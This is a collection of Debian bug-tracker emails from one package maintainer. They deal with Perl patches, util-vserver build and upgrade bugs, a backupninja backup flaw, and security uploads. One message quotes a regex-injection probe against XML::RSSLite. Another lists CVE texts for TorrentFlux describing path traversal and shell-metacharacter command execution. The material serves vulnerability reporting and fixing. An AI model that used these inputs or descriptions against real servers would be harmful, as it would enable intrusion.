
Micah


signature.asc
Description: Digital signature

Bug#501154: Patch adjustment

[Micah Anderson]

I've taken David's patch and removed the extraneous bits (substitutions
done because of the build process, etc.), and attached the adjusted diff
to this bug.

Micah
diff -u sympa-5.3.4/src/sympa.pl sympa-5.3.4/src/sympa.pl
--- sympa-5.3.4/src/sympa.pl
+++ sympa-5.3.4/src/sympa.pl
@@ -159,7 +159,7 @@
 
 $log_level = $main::options{'log_level'} if ($main::options{'log_level'}); 
 
-my @parser_param = ($*, $/);
+my @parser_param = ($/);
 my %loop_info;
 my %msgid_table;
 
@@ -890,7 +890,7 @@
 	my ($t_listname, $t_robot);
 	
 	# trying to fix a bug (perl bug ??) of solaris version
-	($*, $/) = @parser_param;
+	($/) = @parser_param;
 
 	## test ever if it is an old bad file
 	if ($t_filename =~ /^BAD\-/i){
diff -u sympa-5.3.4/debian/changelog sympa-5.3.4/debian/changelog
--- sympa-5.3.4/debian/changelog
+++ sympa-5.3.4/debian/changelog
@@ -1,3 +1,10 @@
+sympa (5.3.4-5.3) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Updating to comply with current versions of Perl (Closes: #501154).
+
+ -- David Moreno Garza [EMAIL PROTECTED]  Sat, 04 Oct 2008 19:47:33 -0400
+
 sympa (5.3.4-5.2) unstable; urgency=low
 
   * Non-maintainer upload.
only in patch2:
unchanged:
--- sympa-5.3.4.orig/src/Lock.pm
+++ sympa-5.3.4/src/Lock.pm
@@ -35,10 +35,10 @@
 use Fcntl qw(LOCK_SH LOCK_EX LOCK_NB);
 use FileHandle;
 
-sub LOCK_SH {1};
-sub LOCK_EX {2};
-sub LOCK_NB {4};
-sub LOCK_UN {8};
+sub LOCK_SH() {1};
+sub LOCK_EX() {2};
+sub LOCK_NB() {4};
+sub LOCK_UN() {8};
 
 my %list_of_locks;
 my $default_timeout = 60 * 20; ## After this period a lock can be stolen
only in patch2:
unchanged:
--- sympa-5.3.4.orig/src/parser.pl
+++ sympa-5.3.4/src/parser.pl
@@ -60,8 +60,8 @@
 my ($old_index, $old_data) = ($index, $data);
 my @old_t = @t;
 
-my @old_mode = ($*, $/);
-($*, $/) = (0, \n);
+my @old_mode = ($/);
+($/) = (0, \n);
 
 my $old_desc;
 if (ref($output) eq 'ARRAY') {   
@@ -104,6 +104,6 @@
 	select $old_desc;
 }
 
-($*, $/) = @old_mode;
+($/) = @old_mode;
 
 ($index, $data) = ($old_index, $old_data);
 @t = @old_t;

signature.asc
Description: Digital signature

Bug#498671: This is not abug

[Micah Anderson]

This isn't a bug at all, all the reasons cited aren't actually bugs. 

 (1) It seems abandoned upstream — the last update is Feb 2003 according
 to CPAN.

Thats not a bug, and doesn't make this package RC. 

 (2) bug 443629 (CDATA handling) makes it useles for a large number of
 feeds, and worse even feeds that work now may break at any time — CDATA
 is standard XML, after all.

Each bug stands on its own. Don't file another bug to point at some
other bug. 

 (3) bug 443629 is not just a CDATA problem. Its actually a
 nearly-arbitrary regexp injection. e.g.,
f(?2)o{hello}/f(?2)o
 gives
   Reference to nonexistent group in regex; marked by -- HERE in
   m/f(?2) -- HERE o/ at /usr/share/perl5/XML/RSSLite.pm line 266.
 Thankfully, { and } are changed to spaces, so (?{code}) is not
 possible, so its probably just a DoS attack (e.g., via exponential time
 regexp).

See above.

 (4) libxml-rsslite-perl has no reverse dependencies in lenny or sid.

 (5) popcon data:

Not really a bug either.

 Overall, the module isn't very widely used, is of questionable quality,
 is probably a security issue, is abandoned upstream, and I suggest
 doesn't belong in lenny.

If you wanted to file a removal request, that should be done another
way, you've filed a bug that doesn't actually report any bug at
all. Please do file an actual security bug, if there is one, but
'probably a security bug' isn't strong enough to file a bug. 

I'm closing this bug, feel free to open a RM request, if you feel thats
the correct way to go.

Micah


signature.asc
Description: Digital signature

Bug#496624: util-vserver: missing dependency : schedutils (for ionice)

[Micah Anderson]

Hi,

* kaouete [EMAIL PROTECTED] [2008-08-26 01:40-0400]:

 Justification: no longer builds from source

Can you provide a build log showing this?


 It looks like the ionice binary is needed by the configure script.
 It is included in the schedutils package which is not a dependency of
 util-vserver.

There is no such package called 'schedutils', ionice is included in
util-linux. 

micah


signature.asc
Description: Digital signature

Bug#496624: util-vserver: missing dependency : schedutils (for ionice)

[Micah Anderson]

* Victor NOEL [EMAIL PROTECTED] [2008-08-26 07:22-0400]:
   It looks like the ionice binary is needed by the configure script.
   It is included in the schedutils package which is not a dependency of
   util-vserver.
  
  There is no such package called 'schedutils', ionice is included in
  util-linux. 
 
 Like someone else said : I am on etch, so I guess this is the
 reason why it did not work.

Yes, you will need to adjust the build-dependencies to make it build
properly on etch.

 If it is in util-linux and this package is a dependency of
 util-vserver, I guess this bug report should be closed :)

I'm closing it, thanks.

 Maybe the depends field can specify a minimum version of 
 util-linux that contains ionice ?

This is not possible to do in etch, you maybe would prefer to wait
until the package is available in backports.org.

 Next time I will check the dependencies more thoroughly :)

No problem,
micah


signature.asc
Description: Digital signature

Bug#484479: Fails to start vservers (capget(): Invalid argument)

[Micah Anderson]

Hi,

Thanks for your bug report.

 some upgrade of util-vserver made all attempts to start vserver fail
 with:
 
 # vserver pmademo start
 capget(): Invalid argument
 capabilities are not enabled in kernel-setup
 
 Downgrading backt to 0.30.214-6 the problem is gone (this is latest
 amd64 binary I found on snapshots.debian.net), but if I rebuild this
 version from source, I get exacly same error, so the problem might be
 actually caused by some statically linked code.

It seems like the buildds created the binaries against too new kernel
headers that have the newest API and util-vserver doesn't support
those. This is any kernel headers newer than 2.6.25.

These typically are in /usr/include/linux and are from the package
linux-libc-dev which currently is shipping at version 2.6.25-4.

This is a problem because we don't have alternative headers available
for previous kernels so that I can do a build-dep, and util-vserver is
happily building against headers that it can't support. 

The util-vserver trunk can build against the newer headers, so maybe we
can pull from there to resolve this.

micah



signature.asc
Description: Digital signature

Bug#484479: Fails to start vservers (capget(): Invalid argument)

[Micah Anderson]

* Micah Anderson [EMAIL PROTECTED] [2008-06-04 13:08-0400]:

 The util-vserver trunk can build against the newer headers, so maybe we
 can pull from there to resolve this.

Hi,

I've applied a patch from upstream that I hope will solve this. Can
you try this on your machine and let me know the results?

You can pull the deb from:

http://people.debian.org/~micah/util-vserver

or if you would prefer to build it, you can get everything there, or
pull it from svn and build it:

svn co svn+ssh://svn.debian.org/svn/pkg-vserver/util-vserver/trunk

I do not have an amd64 machine to test this, so your help would be
appreciated!

Thanks,
Micah



signature.asc
Description: Digital signature

Bug#484479: Fails to start vservers (capget(): Invalid argument)

[Micah Anderson]

* Michal Čihař [EMAIL PROTECTED] [2008-06-04 11:09-0400]:
 Hi
 
 Dne Wed, 4 Jun 2008 13:39:25 -0400
 Micah Anderson [EMAIL PROTECTED] napsal(a):
 
  I've applied a patch from upstream that I hope will solve this. Can
  you try this on your machine and let me know the results?
  
  You can pull the deb from:
  
  http://people.debian.org/~micah/util-vserver
  
  or if you would prefer to build it, you can get everything there, or
  pull it from svn and build it:
  
  svn co svn+ssh://svn.debian.org/svn/pkg-vserver/util-vserver/trunk
  
  I do not have an amd64 machine to test this, so your help would be
  appreciated!
 
 Sorry, but nothing has changed, still same error and behavior. ...
 After quick look at source package ... Because added patch is not being
 applied ;-). After fixing debian/patches/00list package works fine.
 Thanks for finding the patch.

Haha, oops. 

Thanks for testing and finding that. I'll add it to 00list and upload
now.

Micah




signature.asc
Description: Digital signature

Bug#477392: cupsys tries to overwrite /usr/lib/cups/daemon/cups-lpd which is also in package cupsys-bsd

[Micah Anderson]

Package: cupsys
Version: 1.3.7-1
Severity: serious

Doing an apt-get dist-upgrade today gave me this:

Unpacking replacement cupsys ...
dpkg: error processing /var/cache/apt/archives/cupsys_1.3.7-4_i386.deb
(--unpack): trying to overwrite `/usr/lib/cups/daemon/cups-lpd', which is also 
in package cupsys-bsd
 dpkg-deb: subprocess paste killed by signal (Broken pipe)
 Starting Common Unix Printing System: cupsd.


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-vserver-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages cupsys depends on:
ii  adduser   3.107  add and remove users and groups
ii  cupsys-common 1.3.7-1Common UNIX Printing System(tm) - 
ii  debconf [debconf-2.0] 1.5.21 Debian configuration management sy
ii  ghostscript   8.62.dfsg.1-2  The GPL Ghostscript PostScript/PDF
ii  ghostscript-x [gs-esp 8.62.dfsg.1-2  The GPL Ghostscript PostScript/PDF
ii  gs-esp8.62.dfsg.1-2  Transitional package
ii  libavahi-compat-libdn 0.6.22-3   Avahi Apple Bonjour compatibility 
ii  libc6 2.7-10 GNU C Library: Shared libraries
ii  libcupsimage2 1.3.7-1Common UNIX Printing System(tm) - 
ii  libcupsys21.3.7-1Common UNIX Printing System(tm) - 
ii  libdbus-1-3   1.2.1-1simple interprocess messaging syst
ii  libgnutls26   2.2.2-1the GNU TLS library - runtime libr
ii  libkrb53  1.6.dfsg.3~beta1-4 MIT Kerberos runtime libraries
ii  libldap-2.4-2 2.4.7-6.2  OpenLDAP libraries
ii  libpam0g  0.99.7.1-6 Pluggable Authentication Modules l
ii  libpaper1 1.1.23 library for handling paper charact
ii  libslp1   1.2.1-7.2  OpenSLP libraries
ii  lsb-base  3.2-10 Linux Standard Base 3.2 init scrip
ii  perl-modules  5.8.8-12   Core Perl modules
ii  procps1:3.2.7-8  /proc file system utilities
ii  ssl-cert  1.0.18 simple debconf wrapper for OpenSSL
ii  xpdf-utils [poppler-u 3.02-1.3   Portable Document Format (PDF) sui

Versions of packages cupsys recommends:
ii  avahi-utils 0.6.22-3 Avahi browsing, publishing and dis
ii  cupsys-client   1.3.7-1  Common UNIX Printing System(tm) - 
ii  foomatic-filters3.0.2-20080211-3 OpenPrinting printer support - fil
ii  smbclient   1:3.0.28a-2  a LanManager-like simple client fo

-- debconf information:
  cupsys/raw-print: true
  cupsys/backend: ipp, lpd, parallel, scsi, serial, socket, usb, snmp, dnssd



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#456996: Please send some info

[Micah Anderson]

Hi,

* intrigeri [EMAIL PROTECTED] [2008-04-08 03:09-0400]:

 When I upgraded a lenny system from 0.30.214-6 to 0.30.215-2, all my
 VServers were restarted without any warning.

Yes, this is because of the postrm in 0.30.214-6 stopping the
vservers. This actually has been fixed, but if you had 0.30.214-6
installed, any upgrade to a newer version would cause this
behavior. That package's postrm is broken and when you upgrade to a new
package, that broken postrm is executed. Sadly, I could not fix the
package that you actually have installed, but instead must provide you
with a new package that has the fix, but you will experience the problem
when you transition to the fixed package.

I can demonstrate as follows:

1. As you did, I have version 0.30.214-6 installed:

# apt-cache policy util-vserver
util-vserver:
  Installed: 0.30.214-6
  Candidate: 0.30.215-2

2. I have a vserver running:

# vserver-stat
CTX   PROCVSZRSS  userTIME   sysTIMEUPTIME NAME
44   3   8.6M   2.6M   0m00s56   0m00s44   0m02s63 etch

3. I install util-vserver version 0.30.215-1 (using snapshot.d.n), and
it will stop my running vserver, just as you experienced:

# apt-get install util-vserver=0.30.215-1
Reading package lists... Done
Building dependency tree   
Reading state information... Done
Suggested packages:
  yum
The following packages will be upgraded:
  util-vserver
1 upgraded, 0 newly installed, 0 to remove and 253 not upgraded.
Need to get 513kB of archives.
After this operation, 147kB of additional disk space will be used.
WARNING: The following packages cannot be authenticated!
  util-vserver
Install these packages without verification [y/N]? y
Get:1 http://snapshot.debian.net pool/util-vserver util-vserver 0.30.215-1 
[513kB]
Fetched 513kB in 3s (146kB/s)
Preconfiguring packages ...
(Reading database ... 265970 files and directories currently installed.)
Preparing to replace util-vserver 0.30.214-6 (using
.../util-vserver_0.30.215-1_i386.deb) ...
Stopping vservers of type 'default'
Stopping all running Linux-VServer guests...
Stopping etch: done
Unpacking replacement util-vserver ...
Setting up util-vserver (0.30.215-1) ...
Fixing visibility of /proc entries for Linux-VServer guests...done.
Starting Linux-VServers in background
# vserver-stat
CTX   PROCVSZRSS  userTIME   sysTIMEUPTIME NAME
(nothing here).

4. Now I start the vserver again so that I can demonstrate that it will
not be stopped when I install 0.30.215-2:

# vserver etch start
Starting system log daemon: syslogd.
Starting kernel log daemon: klogd.
Not starting internet superserver: no services enabled.
Starting OpenBSD Secure Shell server: sshd.
Starting periodic command scheduler: crond.
#

5. I install util-vserver=0.30.215-2, where you will see that the
vserver is *not* stopped, thus the problem was actually fixed:

# apt-get install util-vserver=0.30.215-2
Reading package lists... Done
Building dependency tree
Reading state information... Done
Suggested packages:
  yum
The following packages will be upgraded:
  util-vserver
1 upgraded, 0 newly installed, 0 to remove and 253 not upgraded.
Need to get 513kB of archives.
After this operation, 0B of additional disk space will be used.
Get:1 ftp://debian.csail.mit.edu sid/main util-vserver 0.30.215-2
[513kB]
Fetched 513kB in 1s (407kB/s) 
Preconfiguring packages ...
(Reading database ... 265996 files and directories currently installed.)
Preparing to replace util-vserver 0.30.215-1 (using
.../util-vserver_0.30.215-2_i386.deb) ...
Unpacking replacement util-vserver ...
Setting up util-vserver (0.30.215-2) ...
Fixing visibility of /proc entries for Linux-VServer guests...done.
Starting Linux-VServers in background

6. Et viola, the vserver is still running:

# vserver-stat
CTX   PROCVSZRSS  userTIME   sysTIMEUPTIME NAME
44   3   8.6M   2.6M   0m00s10   0m00s36   2m32s36 etch

Does that make sense?

Micah


signature.asc
Description: Digital signature

Bug#456996: Please send some info

[Micah Anderson]

* Kurt Roeckx [EMAIL PROTECTED] [2008-03-17 16:51-0400]:
 On Mon, Mar 17, 2008 at 12:41:38PM -0400, Micah Anderson wrote:
  tag 456996 +moreinfo
  thanks
  
  Hi,
  
  I'm trying to track down how this happened for you, can you please
  provide the following:
 
 If you want to reach me, it helps to send a mail to me.  I just noticed
 that you closed it so I went looking at the bug log.
 
  1. the contents of your /etc/default/util-vserver 
  2. the debconf value for util-vserver/prerm_stop_running_vservers
  3. the debconf vaue for util-vserver/start_on_boot
  
  I have not been able to replicate this yet, it may have been fixed in
  -6, I've tried setting these to all possible combinations, but I suppose
  I may have missed something.
 
 I guess you have been able to reproduce now?  Do I still need to do
 anything?

I was able to finally reproduce it, no need to do anything, except
install the new version to see if it solves the problem for you.

Micah


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#456996: Please send some info

[Micah Anderson]

tag 456996 +moreinfo
thanks

Hi,

I'm trying to track down how this happened for you, can you please
provide the following:

1. the contents of your /etc/default/util-vserver 
2. the debconf value for util-vserver/prerm_stop_running_vservers
3. the debconf vaue for util-vserver/start_on_boot

I have not been able to replicate this yet, it may have been fixed in
-6, I've tried setting these to all possible combinations, but I suppose
I may have missed something.

Thanks,
Micah


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#429177: I will upload this for you

[Micah Anderson]

Due to the security nature of this fix (resolves 3 CVEs), I am going to
upload this to the archive for you. I've changed the severity to high
and will upload the package immediately, please use severity 'high' on
all future security uploads.

In the future its probably best if there is a security issue in the
package to ask someone in the debian testing team to sponsor your upload
if you cannot.

 So that just leaves lenny, and it might be quicker just to wait the 10 
 days for it to be promoted from sid to lenny, than to do the work of 
 backporting the XSS fix to 1.2.3.

Lenny doesn't matter right now as part of security. This is not a remote 
code execution hence foot-dragging on my part. It is only a XSS that is 
specific to usage of some code in rails. There are ways a web 
application can treat all input data and sanitize it without relying on 
rails/ruby to do it with magic functions.

Actually, Lenny *does* matter in terms of security, that is the whole
point of the testing security team. 

Micah



signature.asc
Description: Digital signature

Bug#445054: added NEWS.Debian information about this

[Micah Anderson]

I have added NEWS.Debian information about this change to the svn
repository for the package. 

In order to fix this, please migrate to static context IDs, to do this
simply stop your guest, echo an unique number to
/etc/vservers/guest/context and then start your guest.

Micah



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#444798: postinst removes conffiles

[Micah Anderson]

The postinst script unconditionally removes /etc/vserver{,s}.conf on
every configuration.  Since the configuration is apparently preserved
by sourcing the files and creating a symlink in place of their
content, this is okay.  However the package both includes and removes
the conffile vservers.conf which is not allowed.

I've removed in svn the conffile from the package. The functionality 
has been provided by /etc/defaults/util-vserver.

It's is also not okay if VSERVERS_ROOT and VSERVER_ROOT aren't the
only things that were ever specified in those files, or if something
else *could* have been (legitimately?) added there.  Preferably the
files aren't removed if anything else is there:

If you can find a real world example of this, I'd love to hear it, but
what you are talking about here is something like a potato migration to 
sarge, the oldest tarball I could find of util-vserver only had in this 
file things that have been moved to the defaults file.

 The same problem with these removals:

 |# Remove old startup scripts
 |rm -f /etc/init.d/vservers-legacy
 |rm -f /etc/init.d/vservers-default
 |rm -f /etc/init.d/vprocunhide
 |rm -f /etc/init.d/rebootmgr

These are startup scripts that have been rolled into one startup script,
not configuration files.

 |rm -f /etc/default/util-vservere

This was a legacy mistake and never had anything in it.

 There's another problem too: removal of the symlinks isn't preserved:
 run.rev vdirbase

Can you be a little more specific about this issue in a separate bug
report?

Micah



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#444572: Any word on this?

[Micah Anderson]

I haven't been able to install hpijs for over two weeks now (this bug is
18 days old alone), which is making printing really difficult :)

Usually a binNMU doesn't take this long, is there another issue holding
things up?

Micah



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#432410: util-vserver: Please upload the package

[Micah Anderson]

* Raphael Hertzog [EMAIL PROTECTED] [070822 02:57]:
 Package: util-vserver
 Version: 0.30.213-1
 Followup-For: Bug #432410
 
 This bug is marked as pending. Can you upload it?

Unfortunately, I cannot because I am getting some build errors with the
newer build suite in sid. Once these are worked out, I will be able to upload.

 A bin-nmu of this package has been scheduled to fix a problem
 related to symbol hashing (the package has been built with a bad version
 of gcc) and the bin-nmu failed due to this bug.

Can you say more about this?

 When sbuild has an alternative, IIRC it considers only the first choice
 which in that case was modutils. Simply removing the choice is the
 sensible thing to do since modutils is no more available...

Yes, this has been done in the repository some time ago.

Micah


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#432410: util-vserver - FTBFS: Build-depends on removed package: modutils

[Micah Anderson]

Ola,

The modutils package has been removed from sid and lenny as it is a
package that supports 2.4 kernels, which are no longer a part of any
Debian release (including Etch). 

Modutils functionality is now provided by module-init-tools, however I
am not sure why it is needed for util-vserver, do you?

Additionally, the dependency is: modutils|module-init-tools so I am not
sure why the build failed.

Micah

* Bastian Blank [EMAIL PROTECTED] [070709 12:55]:
 Package: util-vserver
 Version: 0.30.213-1+b1
 Severity: serious
 
 There was an error while trying to autobuild your package:
 
  Automatic build of util-vserver_0.30.213-1+b1 on lxdebian.bfinv.de by 
  sbuild/s390 98
 [...]
  E: Package modutils has no installation candidate
  Package modutils is not available, but is referred to by another package.
  This may mean that the package is missing, has been obsoleted, or
  is only available from another source
  apt-get failed.
  Package installation failed
 
 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#403661: torrentflux: fails to install with error code 10

[Micah Anderson]

Remi Vanicat wrote:
 2006/12/19, Cameron Dale [EMAIL PROTECTED]:
 On 12/18/06, Remi Vanicat [EMAIL PROTECTED] wrote:
  $ DEBCONF_DEBUG=developer dpkg --configure --pending
  Setting up torrentflux (2.1-7) ...
  debconf (developer): frontend started
  debconf (developer): frontend running, package name is torrentflux
  debconf (developer): starting /var/lib/dpkg/info/torrentflux.config
 configure
  debconf (developer): -- CAPB backup
  debconf (developer): -- 0 multiselect escape backup
  debconf (developer): -- REGISTER dbconfig-common/database-type
 torrentflux/database-type
  debconf (developer): -- 10 No such template,
 dbconfig-common/database-type
  dpkg: error processing torrentflux (--configure):
   subprocess post-installation script returned error exit status 10
  Errors were encountered while processing:
   torrentflux

 This is looking like a dbconfig-common problem to me, so I'm going to
 forward it to their list to see what they say. I'm having trouble
 reproducing this though. Could you describe what steps you took to get
 this error? Was dbconfig-common installed before installing
 torrentflux, or were they both in the same install?
 
 at the first insalation (the one of 2.6) both where installed at the
 same time. But dbconfig-common as been installed with no problem, and
 I've tried to purge torrentflux and to reinstall it, and it failed.

I just created a sid chroot and attempted to install torrentflux, I did
not encounter this problem.

I tried a few different failure scenarios (mysql-client not available,
mysql-server not installed, database password incorrect, database server
not running) and they all worked fine.

micah



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#402679: backupninja: mysql handler overwrites existing backups even if mysqldump fails

[Micah Anderson]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

Joel Fuster wrote:
 Package: backupninja
 Version: 0.9.4-4
 Severity: critical
 Justification: causes serious data loss
 
 
 The mysql backup handler happily overwrites your existing sql.gz files with
 empty tarballs even in situations such as:
 
 1) mysqldump does not exist
 2) mysql is not running
 
 ...etc.  This just bit me when #2 happened due to a crash in mysql which
 involved corrupted data.  Fortunately I have multiple snapshots of the
 sql.gz files...
 
 It looks like this might only happen when you specify the names of the
 databases you wish to back up.  Also, I have only tested this using the
 mysqldump method.

This only occurs when you specify databases and you have compress=no,
mysqld isn't running or mysqdump doesn't exist. This is a pretty unique
combination of events!

Backupninja is designed with the expectation that the backups that you
are making of your databases are being backed up to another system or
another disk using one of the handlers such as rdiff, duplicity, rsnap,
dup, etc. It is expected that the mysqldumps that are made in your
backup directory are not the end of the backup, but rather this are
shipped off in the remainder of the process. Although I agree its a bad
situation to be in to create a zero-byte mysql dump, I am hesitant to
agree that this is causes serious data loss. Using that logic, you could
claim that backupninja causes serious data loss when you delete
everything from your database and then you do a backup of an empty
database, or likewise.

In any case, I don't like nasty backup surprises, so I've prepared a
fix, and will ask the release managers to have this fix allowed into etch.

Thanks,
Micah
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFf5N09n4qXRzy1ioRAgBNAKCDxYYUoYa6yAhm+tIkaSfcWfo0IQCdFEuR
ThX68NqpEqKfLWF63bBjhk8=
=X1b+
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]

Bug#400582: CVEs assigned

[Micah Anderson]

Hi Cameron and Stefan,

Stefan requested that I request CVE IDs for the torrentflux issues from
Mitre, which I have done, please see below for these. It would be good
to pass these upstream and include them in any changelogs that fix these
issues that haven't been uploaded already.

micah

 New torrentflux issue has come up, reference URL
 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582

 Proposed text:
 A potential remote command execution has been found in torrentflux, a
 php-based torrent management software. Arbitrary code execution in
 metaInfo.php allows an authenticated user to execute remote shell
 commands on the server when $cfg[enable_file_priority] is set to 'false'.

I've created 4 candidates - 3 for the Secunia advisory published in
November, and one for this particular issue.  See below.

==
Name: CVE-2006-6328
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6328
Reference: MISC:http://www.milw0rm.com/exploits/2786
Reference: SECUNIA:22880
Reference: URL:http://secunia.com/advisories/22880
Reference:
CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582

Directory traversal vulnerability in index.php for TorrentFlux 2.2
allows remote attackers to create or overwrite arbitrary files via
sequences in the alias_file parameter.


==
Name: CVE-2006-6329
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6329
Reference: MISC:http://www.milw0rm.com/exploits/2786
Reference: SECUNIA:22880
Reference: URL:http://secunia.com/advisories/22880
Reference:
CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582

index.php for TorrentFlux 2.2 allows remote attackers to delete files
by specifying the target filename in the delfile parameter.


==
Name: CVE-2006-6330
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6330
Reference: MISC:http://www.milw0rm.com/exploits/2786
Reference: SECUNIA:22880
Reference: URL:http://secunia.com/advisories/22880
Reference:
CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582

index.php for TorrentFlux 2.2 allows remote registered users to
execute arbitrary commands via shell metacharacters in the kill
parameter.


==
Name: CVE-2006-6331
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6331
Reference:
CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582
Reference:
MISC:http://bugs.debian.org/cgi-bin/bugreport.cgi/11_missed_security_fixes.dpatch?bug=400582;msg=71;att=1

metaInfo.php in TorrentFlux 2.2, when $cfg[enable_file_priority] is
false, allows remote attackers to execute arbitrary commands via shell
metacharacters (backticks) in the torrent parameter to details.php.





signature.asc
Description: OpenPGP digital signature

Bug#393285: Yep

[Micah Anderson]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



Just wanted to agree with Moritz, I filed the bug to have it removed bug
#390951.

Micah
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFMruS9n4qXRzy1ioRAp6RAJ0ZdJREAlicm5SUgQGkRiZMJTixnwCcD76/
x8bGZS95kY2ij1nCH4xjR0k=
=v2Mu
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]